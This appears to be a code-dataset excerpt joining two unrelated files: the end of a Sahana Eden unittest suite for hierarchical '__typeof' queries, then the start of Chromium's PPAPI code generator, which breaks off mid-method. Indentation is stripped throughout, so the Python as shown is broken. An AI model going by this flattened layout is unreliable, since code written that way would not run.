<resource name="typeof_nonhierarchy" uuid="NONHIERARCHY1">
<data field="name">NonHierarchy1</data>
</resource>
<resource name="typeof_nonhierarchy" uuid="NONHIERARCHY2">
<data field="name">NonHierarchy2</data>
</resource>
<resource name="typeof_hierarchy" uuid="HIERARCHY1">
<data field="name">Type 1</data>
</resource>
<resource name="typeof_hierarchy" uuid="HIERARCHY1-1">
<data field="name">Type 1-1</data>
<reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY1"/>
<reference field="typeof_nonhierarchy_id" resource="typeof_nonhierarchy" uuid="NONHIERARCHY1"/>
</resource>
<resource name="typeof_hierarchy" uuid="HIERARCHY1-1-1">
<data field="name">Type 1-1-1</data>
<reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY1-1"/>
</resource>
<resource name="typeof_hierarchy" uuid="HIERARCHY1-1-2">
<data field="name">Type 1-1-2</data>
<reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY1-1"/>
</resource>
<resource name="typeof_hierarchy" uuid="HIERARCHY1-2">
<data field="name">Type 1-2</data>
<reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY1"/>
</resource>
<resource name="typeof_hierarchy" uuid="HIERARCHY1-2-1">
<data field="name">Type 1-2-1</data>
<reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY1-2"/>
</resource>
<resource name="typeof_hierarchy" uuid="HIERARCHY1-2-2">
<data field="name">Type 1-2-2</data>
<reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY1-2"/>
</resource>
<resource name="typeof_hierarchy" uuid="HIERARCHY2">
<data field="name">Type 2</data>
</resource>
<resource name="typeof_hierarchy" uuid="HIERARCHY2-1">
<data field="name">Type 2-1</data>
<reference field="typeof_nonhierarchy_multi_id" resource="typeof_nonhierarchy"
uuid="["NONHIERARCHY1","NONHIERARCHY2"]"/>
<reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY2"/>
</resource>
<resource name="typeof_hierarchy" uuid="HIERARCHY2-1-1">
<data field="name">Type 2-1-1</data>
<reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY2-1"/>
</resource>
<resource name="typeof_hierarchy" uuid="HIERARCHY2-1-2">
<data field="name">Type 2-1-2</data>
<reference field="parent" resource="typeof_hierarchy" uuid="HIERARCHY2-1"/>
</resource>
</s3xml>
"""
xmltree = etree.ElementTree(etree.fromstring(xmlstr))
current.auth.override = True
resource = s3db.resource("typeof_hierarchy")
resource.import_xml(xmltree)
# -------------------------------------------------------------------------
@classmethod
def tearDownClass(cls):
db = current.db
db.typeof_hierarchy.drop(mode="cascade")
db.typeof_hierarchy_reference.drop()
db.typeof_nonhierarchy.drop()
# -------------------------------------------------------------------------
def setUp(self):
current.auth.override = True
db = current.db
if not hasattr(self, "rows"):
rows = db(db.typeof_hierarchy.id>0).select()
self.rows = {}
self.uids = {}
self.ids = {}
for row in rows:
uid = row.uuid
self.rows[uid] = row
self.uids[uid] = row.id
self.ids[row.id] = uid
if not hasattr(self, "lookup_uids"):
rows = db(db.typeof_nonhierarchy.id>0).select()
self.lookup_uids = {}
for row in rows:
uid = row.uuid
self.lookup_uids[uid] = row.id
current.s3db.configure("typeof_hierarchy", hierarchy="parent")
# -------------------------------------------------------------------------
def tearDown(self):
current.auth.override = False
# -------------------------------------------------------------------------
def testTypeOfReferenceSingle(self):
"""
Test resolution of __typeof queries, for field in referencing
table, with single value
"""
db = current.db
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with field in referencing table
expr = FS("typeof_hierarchy_id").typeof(uids["HIERARCHY1"])
query = expr.query(resource)
table = resource.table
expected = set(uids[uid] for uid in ("HIERARCHY1",
"HIERARCHY1-1",
"HIERARCHY1-1-1",
"HIERARCHY1-1-2",
"HIERARCHY1-2",
"HIERARCHY1-2-1",
"HIERARCHY1-2-2",
))
expected_query = table.typeof_hierarchy_id.belongs(expected)
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfReferenceMultiple(self):
"""
Test resolution of __typeof queries, for field in referencing
table, with multiple values
"""
db = current.db
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with field in referencing table
expr = FS("typeof_hierarchy_id").typeof((uids["HIERARCHY1-2"],
uids["HIERARCHY2-1"],
))
query = expr.query(resource)
table = resource.table
expected = set(uids[uid] for uid in ("HIERARCHY1-2",
"HIERARCHY1-2-1",
"HIERARCHY1-2-2",
"HIERARCHY2-1",
"HIERARCHY2-1-1",
"HIERARCHY2-1-2",
))
expected_query = table.typeof_hierarchy_id.belongs(expected)
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfReferenceNone(self):
"""
Test resolution of __typeof queries, for field in referencing
table, with None value
"""
db = current.db
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with None
expr = FS("typeof_hierarchy_id").typeof(None)
query = expr.query(resource)
table = resource.table
expected = set(uids[uid] for uid in ("HIERARCHY1-2",
"HIERARCHY1-2-1",
"HIERARCHY1-2-2",
))
expected_query = (table.typeof_hierarchy_id == None)
self.assertEquivalent(query, expected_query)
# Test with list
expr = FS("typeof_hierarchy_id").typeof([None])
query = expr.query(resource)
table = resource.table
expected = set(uids[uid] for uid in ("HIERARCHY1-2",
"HIERARCHY1-2-1",
"HIERARCHY1-2-2",
))
expected_query = (table.typeof_hierarchy_id == None)
self.assertEquivalent(query, expected_query)
# Test with multiple values
expr = FS("typeof_hierarchy_id").typeof([None, uids["HIERARCHY1-2"]])
query = expr.query(resource)
table = resource.table
expected = set(uids[uid] for uid in ("HIERARCHY1-2",
"HIERARCHY1-2-1",
"HIERARCHY1-2-2",
))
expected_query = (table.typeof_hierarchy_id.belongs(expected)) | \
(table.typeof_hierarchy_id == None)
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfReferenceNoHierarchy(self):
"""
Test resolution of __typeof queries, for field in referencing
table, with no hierarchy configured
"""
db = current.db
uids = self.uids
# Remove hierarchy setting
current.s3db.clear_config("typeof_hierarchy", "hierarchy")
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with field in referencing table, single value
expr = FS("typeof_hierarchy_id").typeof(uids["HIERARCHY1-2"])
query = expr.query(resource)
expected = uids["HIERARCHY1-2"]
expected_query = resource.table.typeof_hierarchy_id == expected
self.assertEquivalent(query, expected_query)
# Test with field in referencing table, multiple values
expr = FS("typeof_hierarchy_id").typeof((uids["HIERARCHY1-2"],
uids["HIERARCHY2-1"]
))
query = expr.query(resource)
expected = set(uids[uid] for uid in ("HIERARCHY1-2",
"HIERARCHY2-1",
))
expected_query = resource.table.typeof_hierarchy_id.belongs(expected)
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableSingle(self):
"""
Test resolution of __typeof queries, for field in lookup table,
with single value
"""
db = current.db
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with field in hierarchy table
expr = FS("typeof_hierarchy_id$name").typeof("Type 1")
query = expr.query(resource)
table = db.typeof_hierarchy
expected = set(uids[uid] for uid in ("HIERARCHY1",
"HIERARCHY1-1",
"HIERARCHY1-1-1",
"HIERARCHY1-1-2",
"HIERARCHY1-2",
"HIERARCHY1-2-1",
"HIERARCHY1-2-2",
))
expected_query = table.id.belongs(expected)
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableMultiple(self):
"""
Test resolution of __typeof queries, for field in lookup table,
with multiple values
"""
db = current.db
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with field in hierarchy table
expr = FS("typeof_hierarchy_id$name").typeof(("Type 1-2", "Type 2-1"))
query = expr.query(resource)
table = db.typeof_hierarchy
expected = set(uids[uid] for uid in ("HIERARCHY1-2",
"HIERARCHY1-2-1",
"HIERARCHY1-2-2",
"HIERARCHY2-1",
"HIERARCHY2-1-1",
"HIERARCHY2-1-2",
))
expected_query = table.id.belongs(expected)
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableSingleWildcard(self):
"""
Test resolution of __typeof queries, for field in lookup table,
with single value with wildcards
"""
db = current.db
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with field in hierarchy table, with wildcard
expr = FS("typeof_hierarchy_id$name").typeof("Type 1-*")
query = expr.query(resource)
table = db.typeof_hierarchy
expected = set(uids[uid] for uid in ("HIERARCHY1-1",
"HIERARCHY1-1-1",
"HIERARCHY1-1-2",
"HIERARCHY1-2",
"HIERARCHY1-2-1",
"HIERARCHY1-2-2",
))
expected_query = table.id.belongs(expected)
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableMultipleWildcard(self):
"""
Test resolution of __typeof queries, for field in lookup table,
with multiple values with wildcards
"""
db = current.db
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with field in hierarchy table, with wildcard
expr = FS("typeof_hierarchy_id$name").typeof(("Type 1-1-*", "Type 2-1*"))
query = expr.query(resource)
table = db.typeof_hierarchy
expected = set(uids[uid] for uid in ("HIERARCHY1-1-1",
"HIERARCHY1-1-2",
"HIERARCHY2-1",
"HIERARCHY2-1-1",
"HIERARCHY2-1-2",
))
expected_query = table.id.belongs(expected)
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableSingleUnresolvable(self):
"""
Test resolution of __typeof queries, for field in lookup table,
with unresolvable value
"""
db = current.db
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with field in hierarchy table, with wildcard, no match
expr = FS("typeof_hierarchy_id$name").typeof("Type 1-3*")
query = expr.query(resource)
table = db.typeof_hierarchy
expected_query = table.id.belongs(set())
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableNone(self):
"""
Test resolution of __typeof queries, for field in lookup table,
with None value
"""
db = current.db
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with None
expr = FS("typeof_hierarchy_id$name").typeof(None)
query = expr.query(resource)
table = db.typeof_hierarchy
expected_query = table.id.belongs(set())
self.assertEquivalent(query, expected_query)
# Test with list
expr = FS("typeof_hierarchy_id$name").typeof([None])
query = expr.query(resource)
#table = db.typeof_hierarchy
expected_query = table.id.belongs(set())
self.assertEquivalent(query, expected_query)
# Test with multiple values
expr = FS("typeof_hierarchy_id$name").typeof([None, "Type 1-1-2"])
query = expr.query(resource)
#table = db.typeof_hierarchy
expected_query = (table.id == uids["HIERARCHY1-1-2"])
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableReference(self):
"""
Test resolution of __typeof queries, for reference field
in lookup table
"""
db = current.db
uids = self.uids
lookup_uids = self.lookup_uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with single value
lookup = lookup_uids["NONHIERARCHY1"]
expr = FS("typeof_hierarchy_id$typeof_nonhierarchy_id").typeof(lookup)
query = expr.query(resource)
table = db.typeof_hierarchy
expected = set(uids[uid] for uid in ("HIERARCHY1-1",
"HIERARCHY1-1-1",
"HIERARCHY1-1-2",
))
expected_query = table.id.belongs(expected)
# Test with multiple values
lookup = (lookup_uids["NONHIERARCHY1"],
lookup_uids["NONHIERARCHY2"])
expr = FS("typeof_hierarchy_id$typeof_nonhierarchy_id").typeof(lookup)
query = expr.query(resource)
table = db.typeof_hierarchy
expected = set(uids[uid] for uid in ("HIERARCHY1-1",
"HIERARCHY1-1-1",
"HIERARCHY1-1-2",
))
expected_query = table.id.belongs(expected)
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableListReference(self):
"""
Test resolution of __typeof queries, for list:reference field
in lookup table
"""
db = current.db
uids = self.uids
lookup_uids = self.lookup_uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with single value
lookup = lookup_uids["NONHIERARCHY1"]
expr = FS("typeof_hierarchy_id$typeof_nonhierarchy_multi_id").typeof(lookup)
query = expr.query(resource)
table = db.typeof_hierarchy
expected = set(uids[uid] for uid in ("HIERARCHY2-1",
"HIERARCHY2-1-1",
"HIERARCHY2-1-2",
))
expected_query = table.id.belongs(expected)
# Test with multiple values
lookup = (lookup_uids["NONHIERARCHY1"],
lookup_uids["NONHIERARCHY2"])
expr = FS("typeof_hierarchy_id$typeof_nonhierarchy_multi_id").typeof(lookup)
query = expr.query(resource)
table = db.typeof_hierarchy
expected = set(uids[uid] for uid in ("HIERARCHY2-1",
"HIERARCHY2-1-1",
"HIERARCHY2-1-2",
))
expected_query = table.id.belongs(expected)
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfLookupTableNoHierarchy(self):
"""
Test resolution of __typeof queries, for field in lookup
table, with no hierarchy configured
"""
db = current.db
uids = self.uids
# Remove hierarchy setting
current.s3db.clear_config("typeof_hierarchy", "hierarchy")
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with field in lookup table, single value
expr = FS("typeof_hierarchy_id$name").typeof("Type 1-2")
query = expr.query(resource)
table = db.typeof_hierarchy
expected_query = (table.name == "Type 1-2")
self.assertEquivalent(query, expected_query)
# Test with field in lookup table
expr = FS("typeof_hierarchy_id$name").typeof(("Type 1-2", "Type 2-1"))
query = expr.query(resource)
table = db.typeof_hierarchy
expected_query = table.name.belongs(("Type 1-2", "Type 2-1"))
self.assertEquivalent(query, expected_query)
# Test with field in lookup table, multiple values + wildcards
expr = FS("typeof_hierarchy_id$name").typeof(("Type 1-*", "Type 2-1"))
query = expr.query(resource)
table = db.typeof_hierarchy
expected_query = (table.name.like("Type 1-%")) | \
(table.name == "Type 2-1")
self.assertEquivalent(query, expected_query)
# -------------------------------------------------------------------------
def testTypeOfListReferenceSingle(self):
"""
Test resolution of __typeof queries, for list:reference,
with single value
"""
db = current.db
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with single value
expr = FS("typeof_hierarchy_multi_id").typeof(uids["HIERARCHY1"])
query = expr.query(resource)
table = resource.table
expected = set(uids[uid] for uid in ("HIERARCHY1",
"HIERARCHY1-1",
"HIERARCHY1-1-1",
"HIERARCHY1-1-2",
"HIERARCHY1-2",
"HIERARCHY1-2-1",
"HIERARCHY1-2-2",
))
found = self.inspect_multi_query(query,
field = table.typeof_hierarchy_multi_id,
conjunction = db._adapter.OR,
op = db._adapter.CONTAINS)
self.assertEqual(found, expected)
# -------------------------------------------------------------------------
def testTypeOfListReferenceMultiple(self):
"""
Test resolution of __typeof queries, for list:reference,
with multiple values
"""
db = current.db
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with multiple values
expr = FS("typeof_hierarchy_multi_id").typeof((uids["HIERARCHY1-2"],
uids["HIERARCHY2-1"]))
query = expr.query(resource)
table = resource.table
expected = set(uids[uid] for uid in ("HIERARCHY1-2",
"HIERARCHY1-2-1",
"HIERARCHY1-2-2",
"HIERARCHY2-1",
"HIERARCHY2-1-1",
"HIERARCHY2-1-2",
))
found = self.inspect_multi_query(query,
field = table.typeof_hierarchy_multi_id,
conjunction = db._adapter.OR,
op = db._adapter.CONTAINS)
self.assertEqual(found, expected)
# -------------------------------------------------------------------------
def testTypeOfListReferenceNone(self):
"""
Test resolution of __typeof queries, for list:reference,
with None value
"""
db = current.db
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with None
expr = FS("typeof_hierarchy_multi_id").typeof(None)
query = expr.query(resource)
table = resource.table
expected_query = table.id.belongs(set())
self.assertEquivalent(query, expected_query)
# Test with list
expr = FS("typeof_hierarchy_multi_id").typeof([None])
query = expr.query(resource)
#table = resource.table
expected_query = table.id.belongs(set())
self.assertEquivalent(query, expected_query)
# Test with multiple values
expr = FS("typeof_hierarchy_multi_id").typeof((None,
uids["HIERARCHY2-1"]))
query = expr.query(resource)
#table = resource.table
expected = set(uids[uid] for uid in ("HIERARCHY2-1",
"HIERARCHY2-1-1",
"HIERARCHY2-1-2",
))
found = self.inspect_multi_query(query,
field = table.typeof_hierarchy_multi_id,
conjunction = db._adapter.OR,
op = db._adapter.CONTAINS)
self.assertEqual(found, expected)
# -------------------------------------------------------------------------
def testTypeOfListReferenceNoHierarchy(self):
"""
Test resolution of __typeof queries, for list:reference,
with single value
"""
db = current.db
uids = self.uids
# Remove hierarchy setting
current.s3db.clear_config("typeof_hierarchy", "hierarchy")
resource = current.s3db.resource("typeof_hierarchy_reference")
# Test with single value
expr = FS("typeof_hierarchy_multi_id").typeof(uids["HIERARCHY1"])
query = expr.query(resource)
table = resource.table
expected = set(uids[uid] for uid in ("HIERARCHY1",))
found = self.inspect_multi_query(query,
field = table.typeof_hierarchy_multi_id,
conjunction = db._adapter.OR,
op = db._adapter.CONTAINS)
self.assertEqual(found, expected)
# Test with multiple values
expr = FS("typeof_hierarchy_multi_id").typeof((uids["HIERARCHY1-2"],
uids["HIERARCHY2-1"]))
query = expr.query(resource)
table = resource.table
expected = set(uids[uid] for uid in ("HIERARCHY1-2",
"HIERARCHY2-1",
))
found = self.inspect_multi_query(query,
field = table.typeof_hierarchy_multi_id,
conjunction = db._adapter.OR,
op = db._adapter.CONTAINS)
self.assertEqual(found, expected)
# -------------------------------------------------------------------------
def testVirtualFieldSingle(self):
""" Test fallbacks for __typeof with single value virtual field """
resource = current.s3db.resource("typeof_hierarchy")
row = self.rows["HIERARCHY1"]
# vsfield returns "test"
expr = FS("vsfield").typeof("test")
result = expr(resource, row, virtual=True)
self.assertTrue(result)
expr = FS("vsfield").typeof("other")
result = expr(resource, row, virtual=True)
self.assertFalse(result)
expr = FS("vsfield").typeof(["test", "test1", "test2"])
result = expr(resource, row, virtual=True)
self.assertTrue(result)
expr = FS("vsfield").typeof(["other", "other1", "other2"])
result = expr(resource, row, virtual=True)
self.assertFalse(result)
# -------------------------------------------------------------------------
def testVirtualFieldMultiple(self):
""" Test fallbacks for __typeof with multi-value virtual field """
resource = current.s3db.resource("typeof_hierarchy")
row = self.rows["HIERARCHY2"]
# vmfield returns ["test1", "test2", "test3"]
expr = FS("vmfield").typeof("test1")
result = expr(resource, row, virtual=True)
self.assertTrue(result)
expr = FS("vmfield").typeof("other")
result = expr(resource, row, virtual=True)
self.assertFalse(result)
expr = FS("vmfield").typeof(["test1", "other"])
result = expr(resource, row, virtual=True)
self.assertTrue(result)
expr = FS("vmfield").typeof(["other1", "other2"])
result = expr(resource, row, virtual=True)
self.assertFalse(result)
# -------------------------------------------------------------------------
def testHierarchyFilterTypeOf(self):
""" Test S3HierarchyFilter recognition of typeof queries """
uids = self.uids
resource = current.s3db.resource("typeof_hierarchy_reference")
filter_widget = S3HierarchyFilter("typeof_hierarchy_id")
# Test with belongs on filter field
ids = str(uids["HIERARCHY1-1"])
get_vars = {"~.typeof_hierarchy_id__belongs": ids}
variable = filter_widget.variable(resource, get_vars)
expected = set(ids)
values = filter_widget._values(get_vars, variable)
self.assertEqual(values, [ids])
# Test with typeof on filter field
ids = str(uids["HIERARCHY1-1"])
get_vars = {"~.typeof_hierarchy_id__typeof": ids}
variable = filter_widget.variable(resource, get_vars)
expected = set(str(uids[uid]) for uid in ("HIERARCHY1-1",
"HIERARCHY1-1-1",
"HIERARCHY1-1-2",
))
values = filter_widget._values(get_vars, variable)
self.assertEqual(set(values), expected)
# Test with typeof on filter field, multiple values incl. None
ids = ",".join(str(_id) for _id in (uids["HIERARCHY1-1"],
uids["HIERARCHY2-1"],
None))
get_vars = {"~.typeof_hierarchy_id__typeof": ids}
variable = filter_widget.variable(resource, get_vars)
expected = set(str(uids[uid]) for uid in ("HIERARCHY1-1",
"HIERARCHY1-1-1",
"HIERARCHY1-1-2",
"HIERARCHY2-1",
"HIERARCHY2-1-1",
"HIERARCHY2-1-2",
))
expected.add(None)
values = filter_widget._values(get_vars, variable)
self.assertEqual(set(values), expected)
# Test with typeof on field in lookup table
get_vars = {"~.typeof_hierarchy_id$name__typeof": "Type 1-1"}
variable = filter_widget.variable(resource, get_vars)
expected = set(str(uids[uid]) for uid in ("HIERARCHY1-1",
"HIERARCHY1-1-1",
"HIERARCHY1-1-2",
))
values = filter_widget._values(get_vars, variable)
self.assertEqual(set(values), expected)
# Test with typeof on field in lookup table, multiple values
get_vars = {"~.typeof_hierarchy_id$name__typeof": "Type 1-1,Type 2-1"}
variable = filter_widget.variable(resource, get_vars)
expected = set(str(uids[uid]) for uid in ("HIERARCHY1-1",
"HIERARCHY1-1-1",
"HIERARCHY1-1-2",
"HIERARCHY2-1",
"HIERARCHY2-1-1",
"HIERARCHY2-1-2",
))
values = filter_widget._values(get_vars, variable)
self.assertEqual(set(values), expected)
# Test with typeof on field in lookup table, unresolvable
get_vars = {"~.typeof_hierarchy_id$name__typeof": "Type 1-3"}
variable = filter_widget.variable(resource, get_vars)
expected = set()
values = filter_widget._values(get_vars, variable)
self.assertEqual(set(values), expected)
# Test with typeof on field in lookup table, None
get_vars = {"~.typeof_hierarchy_id$name__typeof": "None"}
variable = filter_widget.variable(resource, get_vars)
expected = set()
values = filter_widget._values(get_vars, variable)
self.assertEqual(set(values), expected)
# Test preferrence of belongs in mixed queries
ids = str(uids["HIERARCHY1-1"])
get_vars = {"~.typeof_hierarchy_id__belongs": ids,
"~.typeof_hierarchy_id$name__typeof": "Type 1-1",
}
variable = filter_widget.variable(resource, get_vars)
expected = set(ids)
values = filter_widget._values(get_vars, variable)
self.assertEqual(values, [ids])
# -------------------------------------------------------------------------
def inspect_multi_query(self, query, field=None, conjunction=None, op=None):
"""
Inspect a list:reference multi-value containment query
@param query: the query
@param field: the list:reference field
@param conjunction: the conjunction operator (AND or OR)
@param op: the containment operator (usually CONTAINS)
"""
found = set()
first = query.first
second = query.second
assertEqual = self.assertEqual
inspect_multi_query = self.inspect_multi_query
if isinstance(first, Query) and isinstance(second, Query):
assertEqual(query.op, conjunction)
found |= inspect_multi_query(first,
conjunction = conjunction,
op = op)
found |= inspect_multi_query(second,
conjunction = conjunction,
op = op)
else:
assertEqual(query.first, field)
assertEqual(query.op, op)
found.add(int(query.second))
return found
# -------------------------------------------------------------------------
def equivalent(self, l, r):
"""
Check whether two queries are equivalent
"""
first = l.first
second = l.second
equivalent = self.equivalent
if l.op != r.op:
return False
if isinstance(first, Query):
if isinstance(second, Query):
return equivalent(l.first, r.first) and \
equivalent(l.second, r.second) or \
equivalent(l.second, r.first) and \
equivalent(l.first, r.second)
else:
return equivalent(l.first, r.first)
else:
return l.first == r.first and l.second == r.second
# -------------------------------------------------------------------------
def assertEquivalent(self, query, expected_query):
"""
Shortcut for query equivalence assertion
"""
self.assertTrue(self.equivalent(query, expected_query),
msg = "%s != %s" % (query, expected_query))
# =============================================================================
def run_suite(*test_classes):
""" Run the test suite """
loader = unittest.TestLoader()
suite = unittest.TestSuite()
for test_class in test_classes:
tests = loader.loadTestsFromTestCase(test_class)
suite.addTests(tests)
if suite is not None:
unittest.TextTestRunner(verbosity=2).run(suite)
return
if __name__ == "__main__":
run_suite(
S3HierarchyTests,
S3LinkedHierarchyTests,
S3TypeOfTests,
)
# END ========================================================================
| mit |
chromium2014/src | tools/json_schema_compiler/ppapi_generator.py | 37 | 10976 | # Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import collections
import datetime
import os.path
import sys
import code
import cpp_util
import model
try:
import jinja2
except ImportError:
sys.path.append(os.path.join(os.path.dirname(__file__), '..', '..',
'third_party'))
import jinja2
class _PpapiGeneratorBase(object):
"""A base class for ppapi generators.
Implementations should set TEMPLATE_NAME to a string containing the name of
the template file without its extension. The template will be rendered with
the following symbols available:
name: A string containing the name of the namespace.
enums: A list of enums within the namespace.
types: A list of types within the namespace, sorted such that no element
depends on an earlier element.
events: A dict of events within the namespace.
functions: A dict of functions within the namespace.
year: An int containing the current year.
source_file: The name of the input file.
"""
def __init__(self, namespace):
self._namespace = namespace
self._required_types = {}
self._array_types = set()
self._optional_types = set()
self._optional_array_types = set()
self._dependencies = collections.OrderedDict()
self._types = []
self._enums = []
self.jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.join(os.path.dirname(__file__),
'templates', 'ppapi')))
self._SetupFilters()
self._ResolveTypeDependencies()
def _SetupFilters(self):
self.jinja_environment.filters.update({
'ppapi_type': self.ToPpapiType,
'classname': cpp_util.Classname,
'enum_value': self.EnumValueName,
'return_type': self.GetFunctionReturnType,
'format_param_type': self.FormatParamType,
'needs_optional': self.NeedsOptional,
'needs_array': self.NeedsArray,
'needs_optional_array': self.NeedsOptionalArray,
'has_array_outs': self.HasArrayOuts,
})
def Render(self, template_name, values):
generated_code = code.Code()
template = self.jinja_environment.get_template(
'%s.template' % template_name)
generated_code.Append(template.render(values))
return generated_code
def Generate(self):
"""Generates a Code object for a single namespace."""
return self.Render(self.TEMPLATE_NAME, {
'name': self._namespace.name,
'enums': self._enums,
'types': self._types,
'events': self._namespace.events,
'functions': self._namespace.functions,
# TODO(sammc): Don't change years when regenerating existing output files.
'year': datetime.date.today().year,
'source_file': self._namespace.source_file,
})
def _ResolveTypeDependencies(self):
"""Calculates the transitive closure of the types in _required_types.
Returns a tuple containing the list of struct types and the list of enum
types. The list of struct types is ordered such that no type depends on a
type later in the list.
"""
if self._namespace.functions:
for function in self._namespace.functions.itervalues():
self._FindFunctionDependencies(function)
if self._namespace.events:
for event in self._namespace.events.itervalues():
self._FindFunctionDependencies(event)
resolved_types = set()
while resolved_types < set(self._required_types):
for typename in sorted(set(self._required_types) - resolved_types):
type_ = self._required_types[typename]
self._dependencies.setdefault(typename, set())
for member in type_.properties.itervalues():
self._RegisterDependency(member, self._NameComponents(type_))
resolved_types.add(typename)
while self._dependencies:
for name, deps in self._dependencies.items():
if not deps:
if (self._required_types[name].property_type ==
model.PropertyType.ENUM):
self._enums.append(self._required_types[name])
else:
self._types.append(self._required_types[name])
for deps in self._dependencies.itervalues():
deps.discard(name)
del self._dependencies[name]
break
else:
raise ValueError('Circular dependency %s' % self._dependencies)
def _FindFunctionDependencies(self, function):
for param in function.params:
self._RegisterDependency(param, None)
if function.callback:
for param in function.callback.params:
self._RegisterDependency(param, None)
if function.returns:
self._RegisterTypeDependency(function.returns, None, False, False)
def _RegisterDependency(self, member, depender):
self._RegisterTypeDependency(member.type_, depender, member.optional, False)
def _RegisterTypeDependency(self, type_, depender, optional, array):
if type_.property_type == model.PropertyType.ARRAY:
self._RegisterTypeDependency(type_.item_type, depender, optional, True)
elif type_.property_type == model.PropertyType.REF:
self._RegisterTypeDependency(self._namespace.types[type_.ref_type],
depender, optional, array)
elif type_.property_type in (model.PropertyType.OBJECT,
model.PropertyType.ENUM):
name_components = self._NameComponents(type_)
self._required_types[name_components] = type_
if depender:
self._dependencies.setdefault(depender, set()).add(
name_components)
if array:
self._array_types.add(name_components)
if optional:
self._optional_array_types.add(name_components)
elif optional:
self._optional_types.add(name_components)
@staticmethod
def _NameComponents(entity):
"""Returns a tuple of the fully-qualified name of an entity."""
names = []
while entity:
if (not isinstance(entity, model.Type) or
entity.property_type != model.PropertyType.ARRAY):
names.append(entity.name)
entity = entity.parent
return tuple(reversed(names[:-1]))
def ToPpapiType(self, type_, array=False, optional=False):
"""Returns a string containing the name of the Pepper C type for |type_|.
If array is True, returns the name of an array of |type_|. If optional is
True, returns the name of an optional |type_|. If both array and optional
are True, returns the name of an optional array of |type_|.
"""
if isinstance(type_, model.Function) or type_.property_type in (
model.PropertyType.OBJECT, model.PropertyType.ENUM):
return self._FormatPpapiTypeName(
array, optional, '_'.join(
cpp_util.Classname(s) for s in self._NameComponents(type_)),
namespace=cpp_util.Classname(self._namespace.name))
elif type_.property_type == model.PropertyType.REF:
return self.ToPpapiType(self._namespace.types[type_.ref_type],
optional=optional, array=array)
elif type_.property_type == model.PropertyType.ARRAY:
return self.ToPpapiType(type_.item_type, array=True,
optional=optional)
elif type_.property_type == model.PropertyType.STRING and not array:
return 'PP_Var'
elif array or optional:
if type_.property_type in self._PPAPI_COMPOUND_PRIMITIVE_TYPE_MAP:
return self._FormatPpapiTypeName(
array, optional,
self._PPAPI_COMPOUND_PRIMITIVE_TYPE_MAP[type_.property_type], '')
return self._PPAPI_PRIMITIVE_TYPE_MAP.get(type_.property_type, 'PP_Var')
_PPAPI_PRIMITIVE_TYPE_MAP = {
model.PropertyType.BOOLEAN: 'PP_Bool',
model.PropertyType.DOUBLE: 'double_t',
model.PropertyType.INT64: 'int64_t',
model.PropertyType.INTEGER: 'int32_t',
}
_PPAPI_COMPOUND_PRIMITIVE_TYPE_MAP = {
model.PropertyType.BOOLEAN: 'Bool',
model.PropertyType.DOUBLE: 'Double',
model.PropertyType.INT64: 'Int64',
model.PropertyType.INTEGER: 'Int32',
model.PropertyType.STRING: 'String',
}
@staticmethod
def _FormatPpapiTypeName(array, optional, name, namespace=''):
if namespace:
namespace = '%s_' % namespace
if array:
if optional:
return 'PP_%sOptional_%s_Array' % (namespace, name)
return 'PP_%s%s_Array' % (namespace, name)
if optional:
return 'PP_%sOptional_%s' % (namespace, name)
return 'PP_%s%s' % (namespace, name)
def NeedsOptional(self, type_):
"""Returns True if an optional |type_| is required."""
return self._NameComponents(type_) in self._optional_types
def NeedsArray(self, type_):
"""Returns True if an array of |type_| is required."""
return self._NameComponents(type_) in self._array_types
def NeedsOptionalArray(self, type_):
"""Returns True if an optional array of |type_| is required."""
return self._NameComponents(type_) in self._optional_array_types
def FormatParamType(self, param):
"""Formats the type of a parameter or property."""
return self.ToPpapiType(param.type_, optional=param.optional)
@staticmethod
def GetFunctionReturnType(function):
return 'int32_t' if function.callback or function.returns else 'void'
def EnumValueName(self, enum_value, enum_type):
"""Returns a string containing the name for an enum value."""
